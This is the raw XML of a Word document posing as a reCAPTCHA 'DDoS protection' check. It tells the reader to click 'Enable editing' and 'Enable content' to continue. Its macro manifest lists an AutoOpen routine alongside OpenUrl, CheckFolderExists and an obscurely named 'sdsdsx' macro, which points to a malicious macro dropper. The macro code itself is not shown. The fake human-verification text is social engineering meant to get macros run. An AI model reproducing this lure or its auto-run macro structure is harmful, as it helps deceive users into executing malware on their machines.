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64179" w:rsidRDefault="006C36E0" w:rsidP="006C36E0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00CE44B0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="758920" cy="758920"/>
            <wp:effectExtent l="0" t="0" r="3175" b="317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800px-RecaptchaLogo.svg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25937" cy="8259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767E" w:rsidRPr="00751629" w:rsidRDefault="001C767E" w:rsidP="00CE44B0">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Sitka Heading" w:hAnsi="Sitka Heading"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751629">
        <w:rPr>
          <w:rFonts w:ascii="Sitka Heading" w:hAnsi="Sitka Heading"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This document is for testing whether you are a human visitor and to prevent automated spam submissions. To continue, please click ‘Enable editing’ button on the bar, and then click ‘Enable content’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5075F" w:rsidRPr="00751629" w:rsidRDefault="001C767E" w:rsidP="00E5075F">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Sitka Heading" w:hAnsi="Sitka Heading"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751629">
        <w:rPr>
          <w:rFonts w:ascii="Sitka Heading" w:hAnsi="Sitka Heading"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C767E" w:rsidRPr="00E5075F" w:rsidRDefault="00E5075F" w:rsidP="00E5075F">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:jc w:val="center"/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78BB2560" wp14:editId="3E95C70A">
            <wp:extent cx="928048" cy="928048"/>
            <wp:effectExtent l="0" t="0" r="5715" b="571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unname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8557" cy="1028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C767E" w:rsidRPr="00E5075F" w:rsidSect="00F64179">
      <w:pgSz w:w="15842" w:h="6005" w:orient="landscape" w:code="1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itka Heading">
    <w:panose1 w:val="02000505000000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002EF" w:usb1="4000204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482775B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4030F46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readOnly" w:enforcement="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5FAE"/>
    <w:rsid w:val="0000071D"/>
    <w:rsid w:val="00020821"/>
    <w:rsid w:val="00024082"/>
    <w:rsid w:val="00037816"/>
    <w:rsid w:val="00040213"/>
    <w:rsid w:val="00041789"/>
    <w:rsid w:val="000726EC"/>
    <w:rsid w:val="000A0507"/>
    <w:rsid w:val="000B556E"/>
    <w:rsid w:val="000D0C81"/>
    <w:rsid w:val="000D6831"/>
    <w:rsid w:val="000E2809"/>
    <w:rsid w:val="000E2E51"/>
    <w:rsid w:val="00117AD5"/>
    <w:rsid w:val="001373D7"/>
    <w:rsid w:val="00137953"/>
    <w:rsid w:val="00170770"/>
    <w:rsid w:val="00170CF5"/>
    <w:rsid w:val="001976E2"/>
    <w:rsid w:val="001B72D7"/>
    <w:rsid w:val="001C767E"/>
    <w:rsid w:val="001D2E66"/>
    <w:rsid w:val="001E75C0"/>
    <w:rsid w:val="00210107"/>
    <w:rsid w:val="00223CF3"/>
    <w:rsid w:val="00255446"/>
    <w:rsid w:val="00283EEF"/>
    <w:rsid w:val="002A33EB"/>
    <w:rsid w:val="002B679F"/>
    <w:rsid w:val="002C2463"/>
    <w:rsid w:val="002C4D51"/>
    <w:rsid w:val="002D77D0"/>
    <w:rsid w:val="002E633E"/>
    <w:rsid w:val="002F0BEE"/>
    <w:rsid w:val="00334FF5"/>
    <w:rsid w:val="00342DAE"/>
    <w:rsid w:val="00343AD4"/>
    <w:rsid w:val="003610C0"/>
    <w:rsid w:val="00365CFD"/>
    <w:rsid w:val="003720D9"/>
    <w:rsid w:val="00375F83"/>
    <w:rsid w:val="003925E0"/>
    <w:rsid w:val="003A01F2"/>
    <w:rsid w:val="003A0433"/>
    <w:rsid w:val="003A1730"/>
    <w:rsid w:val="003A6664"/>
    <w:rsid w:val="003B5FF0"/>
    <w:rsid w:val="003D5D3D"/>
    <w:rsid w:val="00404322"/>
    <w:rsid w:val="004173E2"/>
    <w:rsid w:val="00421AFC"/>
    <w:rsid w:val="004A027B"/>
    <w:rsid w:val="004A6DDB"/>
    <w:rsid w:val="004C1103"/>
    <w:rsid w:val="004C2801"/>
    <w:rsid w:val="005071B5"/>
    <w:rsid w:val="005524D3"/>
    <w:rsid w:val="005760D5"/>
    <w:rsid w:val="005778DB"/>
    <w:rsid w:val="005A2289"/>
    <w:rsid w:val="005D44D5"/>
    <w:rsid w:val="005F15D9"/>
    <w:rsid w:val="0060595A"/>
    <w:rsid w:val="00642630"/>
    <w:rsid w:val="00650141"/>
    <w:rsid w:val="00683B4A"/>
    <w:rsid w:val="006975CF"/>
    <w:rsid w:val="006A344E"/>
    <w:rsid w:val="006C36E0"/>
    <w:rsid w:val="00710B9B"/>
    <w:rsid w:val="00726DE9"/>
    <w:rsid w:val="00751629"/>
    <w:rsid w:val="007679E9"/>
    <w:rsid w:val="00791683"/>
    <w:rsid w:val="007A4A54"/>
    <w:rsid w:val="007B17BD"/>
    <w:rsid w:val="007B3153"/>
    <w:rsid w:val="007E52BC"/>
    <w:rsid w:val="00821EB8"/>
    <w:rsid w:val="00824507"/>
    <w:rsid w:val="00826B3C"/>
    <w:rsid w:val="00827111"/>
    <w:rsid w:val="0083501F"/>
    <w:rsid w:val="0083734A"/>
    <w:rsid w:val="008840FA"/>
    <w:rsid w:val="008A168B"/>
    <w:rsid w:val="008A38A0"/>
    <w:rsid w:val="008F2676"/>
    <w:rsid w:val="00911760"/>
    <w:rsid w:val="00931657"/>
    <w:rsid w:val="00946320"/>
    <w:rsid w:val="00962904"/>
    <w:rsid w:val="00971CC1"/>
    <w:rsid w:val="00981E0E"/>
    <w:rsid w:val="00997C3C"/>
    <w:rsid w:val="009A10C0"/>
    <w:rsid w:val="009A2F2D"/>
    <w:rsid w:val="009A3EAB"/>
    <w:rsid w:val="009B2222"/>
    <w:rsid w:val="009B708A"/>
    <w:rsid w:val="009C0268"/>
    <w:rsid w:val="00A067BC"/>
    <w:rsid w:val="00A5619F"/>
    <w:rsid w:val="00A8417C"/>
    <w:rsid w:val="00A97B57"/>
    <w:rsid w:val="00AC7AF0"/>
    <w:rsid w:val="00AD0D1D"/>
    <w:rsid w:val="00AE49EE"/>
    <w:rsid w:val="00B059BB"/>
    <w:rsid w:val="00B230D3"/>
    <w:rsid w:val="00B36E40"/>
    <w:rsid w:val="00B83AEB"/>
    <w:rsid w:val="00B868FF"/>
    <w:rsid w:val="00B951E7"/>
    <w:rsid w:val="00B9535E"/>
    <w:rsid w:val="00BA760D"/>
    <w:rsid w:val="00BC3E5F"/>
    <w:rsid w:val="00BD5FAE"/>
    <w:rsid w:val="00C07DEE"/>
    <w:rsid w:val="00C12390"/>
    <w:rsid w:val="00C24027"/>
    <w:rsid w:val="00C90001"/>
    <w:rsid w:val="00CE44B0"/>
    <w:rsid w:val="00CF38FA"/>
    <w:rsid w:val="00D04E8E"/>
    <w:rsid w:val="00D96C86"/>
    <w:rsid w:val="00DA2461"/>
    <w:rsid w:val="00DD1CC9"/>
    <w:rsid w:val="00DD3719"/>
    <w:rsid w:val="00DE6B0E"/>
    <w:rsid w:val="00E106DA"/>
    <w:rsid w:val="00E26430"/>
    <w:rsid w:val="00E3224E"/>
    <w:rsid w:val="00E32B3F"/>
    <w:rsid w:val="00E34A5B"/>
    <w:rsid w:val="00E5075F"/>
    <w:rsid w:val="00E70CAB"/>
    <w:rsid w:val="00E72ED1"/>
    <w:rsid w:val="00E743CA"/>
    <w:rsid w:val="00E9095A"/>
    <w:rsid w:val="00E91F24"/>
    <w:rsid w:val="00EA683B"/>
    <w:rsid w:val="00EB02D0"/>
    <w:rsid w:val="00EB1D4B"/>
    <w:rsid w:val="00EC094C"/>
    <w:rsid w:val="00EE68DB"/>
    <w:rsid w:val="00F07E7F"/>
    <w:rsid w:val="00F12502"/>
    <w:rsid w:val="00F14BB4"/>
    <w:rsid w:val="00F43783"/>
    <w:rsid w:val="00F64179"/>
    <w:rsid w:val="00FA41D4"/>
    <w:rsid w:val="00FA5B52"/>
    <w:rsid w:val="00FC0284"/>
    <w:rsid w:val="00FD5617"/>
    <w:rsid w:val="00FF0E8B"/>
    <w:rsid w:val="00FF12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5D897A6-B717-4FB3-92BD-06D887A3A2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4179"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F64179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6E6E6E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64179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A5A5A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64179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A5A5A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6417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A5A5A5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6417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A5A5A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6417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6E6E6E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6417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6E6E6E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6417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6E6E6E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6417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6E6E6E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4179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="6E6E6E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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="A5A5A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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="A5A5A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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="A5A5A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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="A5A5A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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:color w:val="6E6E6E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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="6E6E6E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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="6E6E6E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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="6E6E6E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64179"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="B2B2B2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F64179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B2B2B2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F64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="B2B2B2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64179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DDDDDD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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="DDDDDD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F64179"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00F64179"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00F64179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F64179"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="B2B2B2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F64179"/>
    <w:rPr>
      <w:color w:val="B2B2B2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64179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B2B2B2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64179"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="B2B2B2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F64179"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="BABABA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F64179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F64179"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="BABABA" w:themeColor="text1" w:themeTint="A6"/>
      <w:u w:val="none" w:color="CACACA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F64179"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="B2B2B2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F64179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64179"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F6417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OPENURL" wne:name="project.Module1.OpenUrl" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.SDSDSX" wne:name="project.Module1.sdsdsx" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.AUTOOPEN" wne:name="project.Module1.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.CHECKFOLDEREXISTS" wne:name="project.Module1.CheckFolderExi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Custom 3">
      <a:dk1>
        <a:srgbClr val="969696"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="B2B2B2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27BEDC-EFDE-4E25-B007-ECC82F7719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3200</TotalTime>
  <Pages>1</Pages>
  <Words>33</Words>
  <Characters>190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141</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-20T05:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-19T09:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>